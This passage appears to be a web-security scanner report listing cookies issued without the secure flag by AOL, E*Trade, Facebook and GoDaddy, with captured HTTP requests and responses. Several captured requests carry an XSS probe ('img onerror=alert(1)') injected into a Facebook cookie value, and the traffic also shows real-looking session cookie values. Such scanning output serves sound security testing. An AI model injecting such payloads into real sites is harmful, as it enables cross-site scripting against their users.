The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_cqr/logout/mcLogout.psp?sitedomain=realestate.aol.com HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:42 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557422&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1520
Connection: close

<html>
<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LA
...[SNIP]...

10.14. https://my.screenname.aol.com/badbrowser.psp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/badbrowser.psp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SNS_LDC=1&-&-&1304557177&2&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

10.15. https://us.etrade.com/e/t/welcome/whychooseetrade previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://us.etrade.com
Path:	/e/t/welcome/whychooseetrade

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

WRC_ID=173.193.214.243-1304592961929; Domain=.etrade.com; Expires=Wed, 06-Sep-2062 21:52:02 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /e/t/welcome/whychooseetrade HTTP/1.1
Host: us.etrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 10:56:01 GMT
Server: Apache
Set-Cookie: WRC_ID=173.193.214.243-1304592961929; Domain=.etrade.com; Expires=Wed, 06-Sep-2062 21:52:02 GMT; Path=/
Set-Cookie: JSESSIONID=E2E6C4CD8BD8A20698F951F8B40D2658.tomcat1; Path=/e; Secure
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN">
<head>
<!--
...[SNIP]...

10.16. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.17. https://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.20.120
Connection: close
Date: Thu, 05 May 2011 10:56:54 GMT
Content-Length: 40729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.18. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.19. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

10.20. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lsd=bnJmV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.21. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

10.22. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.23. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

lsd=Mkkns; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.24. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.25. https://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.26. https://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=1304595854; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
W=1304595854; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.27. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

10.28. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close

10.29. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
